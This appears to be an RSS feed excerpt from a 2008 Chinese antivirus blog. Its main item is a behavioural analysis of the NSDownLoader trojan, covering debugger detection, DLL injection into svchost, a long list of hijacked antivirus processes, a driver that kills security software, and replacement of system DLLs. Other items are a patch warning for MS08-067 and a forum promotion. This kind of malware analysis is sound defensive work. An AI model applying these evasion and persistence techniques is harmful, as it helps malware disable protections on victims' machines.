<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt">并遍历是否存在</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">ImportREC.exe</font></span><span style="mso-bidi-font-size: 10.5pt">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">C32Asm.exe</font></span><span style="mso-bidi-font-size: 10.5pt">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">LordPE.exe</font></span><span style="mso-bidi-font-size: 10.5pt">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">PEditor.exe</font></span><span style="mso-bidi-font-size: 10.5pt">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">OllyICE.exe</font></span><span style="mso-bidi-font-size: 10.5pt">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">OllyDbg.exe</font></span><span style="mso-bidi-font-size: 10.5pt">等进程，如果是则自身退出。</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">2.</font></span><span style="mso-bidi-font-size: 10.5pt">停止如下服务</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">Application Management</font></span><span style="mso-bidi-font-size: 10.5pt">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">Task Scheduler</font></span><span style="mso-bidi-font-size: 10.5pt">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">System Restore Service</font></span><span style="mso-bidi-font-size: 10.5pt">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">Windows Image Acquisition (WIA)</font></span><span style="mso-bidi-font-size: 10.5pt">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">Windows Time</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">3.</font></span><span style="mso-bidi-font-size: 10.5pt">之后生成如下文件：</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">%temp%\dll???.dll(???</font></span><span style="mso-bidi-font-size: 10.5pt">为随机数字</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">)</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">4..Dll??.dll</font></span><span style="mso-bidi-font-size: 10.5pt">注入到</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">svchost.exe</font></span><span style="mso-bidi-font-size: 10.5pt">中，并创建远程线程。</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">(</font></span><span style="mso-bidi-font-size: 10.5pt">之前会获得系统时间，如果系统年份大于</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">2008</font></span><span style="mso-bidi-font-size: 10.5pt">则不注入</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">svchost.exe)</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">Dll??.dll</font></span><span style="mso-bidi-font-size: 10.5pt">注入</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">svchost.exe</font></span><span style="mso-bidi-font-size: 10.5pt">后有如下行为：</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">(1)</font></span><span style="mso-bidi-font-size: 10.5pt">创建一个事件</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">NSDownLoader20Vip02</font></span><span style="mso-bidi-font-size: 10.5pt">。</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt">(2)</span><span style="mso-bidi-font-size: 10.5pt">创建多个线程执行不同的操作</span></p>
<span style="mso-bidi-font-size: 10.5pt">
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt">a.</span><span style="mso-bidi-font-size: 10.5pt">读取一个</span><span style="mso-bidi-font-size: 10.5pt">txt</span><span style="mso-bidi-font-size: 10.5pt">格式的下载列表（本例为</span><span style="mso-bidi-font-size: 10.5pt"><a href="http://tk123.********.cn/pk/tk123.txt">http://tk123.********.cn/pk/tk123.txt</a></span><span style="mso-bidi-font-size: 10.5pt">），将木马和病毒下载到</span><span style="mso-bidi-font-size: 10.5pt">%temp%</span><span style="mso-bidi-font-size: 10.5pt">文件夹。</span></p>
<span style="mso-bidi-font-size: 10.5pt">
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt">b.</span><span style="mso-bidi-font-size: 10.5pt">映像劫持如下进程</span><span style="mso-bidi-font-size: 10.5pt">pccguide.exe,ZONEALARM.exe,zonealarm.exe,wink.exe,windows</span><span style="mso-bidi-font-size: 10.5pt">优化大师</span><span style="mso-bidi-font-size: 10.5pt">.exe,WFINDV32.exe,webtrap.exe,WEBSCANX.exe,WEBSCAN.exe,vsstat.exe,VSSCAN40,VSHWIN32.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,vshwin32.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,VSECOMR.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;  </span>,VPC32.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,vir.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,VETTRAY.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,VET95.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,vavrunr.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,UlibCfg.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,TSC.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,tmupdito.exe<span style="mso-tab-count: 1"> </span>,tmproxy.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,TMOAgent.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;  </span>,Tmntsrv.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,TDS2-NT.exe<span style="mso-tab-count: 1"> </span>,TDS2-98.exe<span style="mso-tab-count: 1"> </span>,TCA.exe<span style="mso-tab-count: 1"> </span>,TBSCAN.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,symproxysvc.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,SWEEP95.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,spy.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,SPHINX.exe<span style="mso-tab-count: 1"> </span>,smtpsvc.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,SMC.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,sirc32.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,SERV95.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,secu.exe<span style="mso-tab-count: 1"> </span>,SCRSCAN.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,scon.exe<span style="mso-tab-count: 1"> </span>,SCANPM.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,SCAN32.exe<span style="mso-tab-count: 1"> </span>,scan.exe<span style="mso-tab-count: 1"> </span>,scam32.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,safeweb.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,safeboxTray.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,rn.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,Rfw.exe<span style="mso-tab-count: 1"> </span>,rescue32.exe<span style="mso-tab-count: 1"> </span>,regedit.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;  </span>,RavTask.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,RavStub.exe<span style="mso-tab-count: 1"> </span>,RavMonD.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,RavMon.exe<span style="mso-tab-count: 1"> </span>,rav7win.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,RAV7.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,ras.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,pview95.exe<span style="mso-tab-count: 1"> </span>,prot.exe<span style="mso-tab-count: 1"> </span>,program.exe<span style="mso-tab-count: 1"> </span>,PpPpWallRun.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,pop3trap.exe<span style="mso-tab-count: 1"> </span>,PERSFW.exe<span style="mso-tab-count: 1"> </span>,PCFWALLICON.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,pccwin98.exe<span style="mso-tab-count: 1"> </span>,pccmain.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,pcciomon.exe<span style="mso-tab-count: 1"> </span>,PCCClient.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,pcc.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,PAVCL.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,PADMIN.exe<span style="mso-tab-count: 1"> </span>,OUTPOST.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,office.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,NVC95.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,NUPGRADE.exe<span style="mso-tab-count: 1"> </span>,norton.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,NORMIST.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,NMAIN.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,nisum.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,nisserv.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;  </span>,NAVWNT.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,navwnt.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,NAVW32.exe<span style="mso-tab-count: 1"> </span>,NAVW.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,NAVSCHED.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,navrunr.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,NAVNT.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,NAVLU32.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,navapw32.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,navapsvc.exe<span style="mso-tab-count: 1"> </span>,N32ACAN.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,ms.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,MPFTRAY.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,MOOLIVE.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;  </span>,moniker.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,mon.exe<span style="mso-tab-count: 1"> </span>,microsoft.exe<span style="mso-tab-count: 1"> </span>,mcafee.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,LUCOMSERVER.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,luall.exe<span style="mso-tab-count: 1"> </span>,LOOKOUT.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;  </span>,lockdown2000.exe<span style="mso-tab-count: 1"> </span>,lamapp.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,kwatch.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,KVPreScan.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;  </span>,KVMonXP.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,KRF.exe<span style="mso-tab-count: 1"> </span>,KPPMain.exe<span style="mso-tab-count: 1"> </span>,kpfwsvc.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,kpfw32.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;  </span>,KPFW32.exe<span style="mso-tab-count: 1"> </span>,kissvc.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,kavstart.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,kav32.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,Kasmain.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,Kabackreport.exe<span style="mso-tab-count: 1"> </span>,JED.exe<span style="mso-tab-count: 1"> </span>,iomon98.exe<span style="mso-tab-count: 1"> </span>,iom.exe<span style="mso-tab-count: 1"> </span>,ICSSUPPNT.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;  </span>,ICMOON.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,ICLOADNT.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,ICLOAD95.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;  </span>,IceSword.exe<span style="mso-tab-count: 1"> </span>,ice.exe<span style="mso-tab-count: 1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span>,IBMAVSP.exe,IBMASN.exe,IAMSERV.exe,IAMAPP.exe,F-STOPW.exe,f-stopw.exe,FRW.exe,FP-WIN.exe,fp-win.exe,f-prot95.exe,F-PROT.exe,fir.exe,FINDVIRU.exe,F-AGNT95.exe,explorewclass.exe,ESPWATCH.exe,ESAFE.exe,EFINET32.exe,ECENGINE.exe,DVP95.exe,DV95_O.exe,DV95.exe,debu.exe,dbg.exe,DAVPFW.exe,CLEANER3.exe,CLEANER.exe,CLAW95CT.exe,CLAW95.exe,cfinet32.exe,cfinet.exe,CFIND.exe,CFIAUDIT.exe,CFIADMIN.exe,CCenter.exe,BLACKICE.exe,BLACKD.exe,avxonsol.exe,AVWIN95.exe,avsynmgr.exe,AVSCHED32.exe,AVPUPD.exe,AVPTC32.exe,AVPNT.exe,AVPMON.exe,AVPM.exe,avpdos32.exe,AVPCC.exe,avp32.exe,avp.exe,AVKSERV.exe,avk.exe,AVGCTRL.exe,AVE32.exe,AVCONSOL.exe,AUTODOWN.exe,ATRACK.exe,atrack.exe,APVXDWIN.exe,antivir.exe,ANTI-TROJAN.exe, anti.exe,ACKWIN32.exe, 360tray.exe, 360safe.exe,_AVPM.exe,_AVPCC.exe,_AVP32.exe…</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt">指向</span><span style="mso-bidi-font-size: 10.5pt">svchost.exe</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<span style="mso-bidi-font-size: 10.5pt">
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt">c.</span><span style="mso-bidi-font-size: 10.5pt">在</span><span style="color: black; mso-bidi-font-size: 10.5pt; mso-hansi-: 0pt">%SystemRoot%\system32\</span><span style="mso-bidi-font-size: 10.5pt">目录下生成</span><span style="mso-bidi-font-size: 10.5pt">Nskhelper2.sys</span><span style="mso-bidi-font-size: 10.5pt">恢复</span><span style="mso-bidi-font-size: 10.5pt">SSDT</span><span style="mso-bidi-font-size: 10.5pt">并结束某些杀毒软件进程。</span></p>
<span style="mso-bidi-font-size: 10.5pt">
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt">d.</span><span style="mso-bidi-font-size: 10.5pt">释放与机器狗功能类似的驱动</span><span style="mso-bidi-font-size: 10.5pt">NSPASS?.sys(?</span><span style="mso-bidi-font-size: 10.5pt">代表数字</span><span style="mso-bidi-font-size: 10.5pt">)</span><span style="mso-bidi-font-size: 10.5pt">，直接访问磁盘并替换如下</span><span style="mso-bidi-font-size: 10.5pt">dll</span><span style="mso-bidi-font-size: 10.5pt">文件</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black; mso-bidi-font-size: 10.5pt; mso-hansi-: 0pt">%SystemRoot%\system32\schedsvc.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black; mso-bidi-font-size: 10.5pt; mso-hansi-: 0pt">%SystemRoot%\System32\appmgmts.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black; mso-bidi-font-size: 10.5pt; mso-hansi-: 0pt">%SystemRoot%\System32\srsvc.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black; mso-bidi-font-size: 10.5pt; mso-hansi-: 0pt">%SystemRoot%\System32\w32time.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="color: black; mso-bidi-font-size: 10.5pt; mso-hansi-: 0pt">%SystemRoot%\system32\wiaservc.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="color: black; mso-bidi-font-size: 10.5pt; mso-hansi-: 0pt">%SystemRoot%\system32\schedsvc.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="color: black; mso-bidi-font-size: 10.5pt; mso-hansi-: 0pt">替换为病毒的</span><span style="color: black; mso-bidi-font-size: 10.5pt; mso-hansi-: 0pt">dll</span><span style="color: black; mso-bidi-font-size: 10.5pt; mso-hansi-: 0pt">。</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt">由于篇幅所限 下转 <span style="mso-bidi-font-size: 10.5pt">警惕</span><span style="mso-bidi-font-size: 10.5pt">NSDownLoader</span><span style="mso-bidi-font-size: 10.5pt">木马下载器</span><span style="mso-bidi-font-size: 10.5pt">(U</span><span style="mso-bidi-font-size: 10.5pt">盘病毒</span><span style="mso-bidi-font-size: 10.5pt">system.dll)之二</span></p>
</span></span></span></span></font></span> <a href="http://hi.baidu.com/newcenturysun/blog/item/4bc39e13616a5fd7f7039ee0.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/4bc39e13616a5fd7f7039ee0.html#comment">查看评论</a>]]></description>
        <pubDate>2008-11-26  23:59</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/4bc39e13616a5fd7f7039ee0.html</guid>
</item>

<item>
        <title><![CDATA[北京域名纠错系统网页被挂马]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/4431bcd3625d6933970a161d.html]]></link>
        <description><![CDATA[
		
		<p>附图：截取时间2008－11－16 21：03</p>
<p> </p>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/be4f20a81365e9adca130c62.jpg"></div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%B2%A1%B6%BE%B7%C0%B7%B6%D3%EB%C9%B1%B3%FD">病毒防范与杀除</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/4431bcd3625d6933970a161d.html#comment">查看评论</a>]]></description>
        <pubDate>2008-11-16  21:12</pubDate>
        <category><![CDATA[病毒防范与杀除]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/4431bcd3625d6933970a161d.html</guid>
</item>

<item>
        <title><![CDATA[紧急预警！利用MS08-067漏洞的蠕虫可能已经出现！]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/e8fe76d9c33e5e2b10df9b40.html]]></link>
        <description><![CDATA[
		
		<p>最近发现有些人反映上网一段时间后 出现svchost.exe的错误，提示信息类似&ldquo;svchost.exe应用程序错误&ldquo;0x7ffa0eb8&quot;指令引用的&quot;0x7ffa0eb8&quot;内存.该内存不能为written&rdquo; 之后便不能上网</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/894ce224f88fc5288644f95f.jpg"></p>
<p>打了之前的几个&ldquo;波&rdquo;的补丁均无效，因此怀疑利用MS08-067漏洞的蠕虫已经出现，各位务必即时打好补丁！</p>
<p>关于该补丁的介绍可以参考<a href="http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx">http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx</a>通过下面的表格中查找对应你的操作系统的补丁文件 下载安装上 重启计算机。</p>
<p><strong><font color="#ff0000">XPSP2和XPSP3的用户 可以直接到这个地址下载补丁</font></strong><a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=0d5f9b6e-9265-44b9-a376-2067b73d6a03&amp;DisplayLang=zh-cn" target="_blank"><strong><font color="#ff0000">http://www.microsoft.com/downloads/details.aspx?FamilyID=0d5f9b6e-9265-44b9-a376-2067b73d6a03&amp;DisplayLang=zh-cn</font></strong></a></p>
<p>安装卡卡助手的用户可以直接通过卡卡助手打上这个补丁：</p>
<p>方法：请打开卡卡上网助手<br>
点击首页&ldquo;漏洞扫描与修复&rdquo;下的&ldquo;立即启动&rdquo;按钮</p>
<div forimg="1">
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/07f2f3114519bfdda6ef3f26.jpg"></div>
</div>
<p>之后按照提示将扫到的补丁都装上即可 <br>
<span style="display: none; left: 232px; position: absolute; top: 551px"><img border="0" src="http://bbs.ikaka.com/images/attachicons/attachimg.gif"></span></p> <a href="http://hi.baidu.com/newcenturysun/blog/item/e8fe76d9c33e5e2b10df9b40.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%B2%A1%B6%BE%B7%C0%B7%B6%D3%EB%C9%B1%B3%FD">病毒防范与杀除</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/e8fe76d9c33e5e2b10df9b40.html#comment">查看评论</a>]]></description>
        <pubDate>2008-11-03  00:10</pubDate>
        <category><![CDATA[病毒防范与杀除]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/e8fe76d9c33e5e2b10df9b40.html</guid>
</item>

<item>
        <title><![CDATA[“十一黄金周”快来参加卡卡论坛系列活动 电动狮子等你拿哦！（友情推荐）]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/556a57a9df7679fa1e17a2e3.html]]></link>
        <description><![CDATA[
		
		<p><strong><font color="#ff0000" size="5">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  发财咯，发财咯，图片能够换狮子~手舞足蹈能唱歌，更有靠垫贴心意，论坛十一有大礼，有玩儿有奖真欢喜！</font></strong><a href="http://bbs.ikaka.com/showtopic-8550993.aspx"><strong><font color="#ff0000" size="5">http://bbs.ikaka.com/showtopic-8550993.aspx</font></strong></a><strong><font color="#ff0000" size="5">；十一干啥？睡觉做梦。睡觉有啥意思？做梦也能拿奖啊！还是实实在在的~不信你看&mdash;&mdash;<a href="http://bbs.ikaka.com/showtopic-8550993.aspx"><strong><font color="#ff0000" size="5">http://bbs.ikaka.com/showtopic-8550993.aspx</font></strong></a>；养猫，养狗？太常规。蜥蜴，蜘蛛？过时了！卡卡论坛，给你自己的狮子，快来领养吧~<a href="http://bbs.ikaka.com/showtopic-8550993.aspx"><strong><font color="#ff0000" size="5">http://bbs.ikaka.com/showtopic-8550993.aspx</font></strong></a>；</font></strong></p>
<p><strong><font color="#ff0000" size="5">部分奖品展示：</font></strong></p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/362821fa0fde75939e514639.jpg"> <font color="#ff0000" size="5"><strong>电动狮子 </strong></font></p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/727d8c22371b02e9d7cae23b.jpg"> <font color="#ff0000" size="5"><strong>卡卡靠垫</strong></font></p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/ed0b56a73628c68fd1435801.jpg">  <font color="#ff0000" size="5"><strong>纯钢钥匙链</strong></font></p>
<p> </p>
</div> <a href="http://hi.baidu.com/newcenturysun/blog/item/556a57a9df7679fa1e17a2e3.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%B8%F6%C8%CB%C9%FA%BB%EE">个人生活</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/556a57a9df7679fa1e17a2e3.html#comment">查看评论</a>]]></description>
        <pubDate>2008-09-25  23:31</pubDate>
        <category><![CDATA[个人生活]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/556a57a9df7679fa1e17a2e3.html</guid>
</item>

<item>
        <title><![CDATA[警惕恶意病毒“中华吸血鬼”！]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/32391d2490862f2ed40742b7.html]]></link>
        <description><![CDATA[
		
		<p><font color="#ff0000" size="2">作者：清新阳光&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  ( </font><a href="http://hi.baidu.com/newcenturysun"><font color="#ff0000" size="2">http://hi.baidu.com/newcenturysun</font></a><font size="2"><font color="#ff0000">)<br>
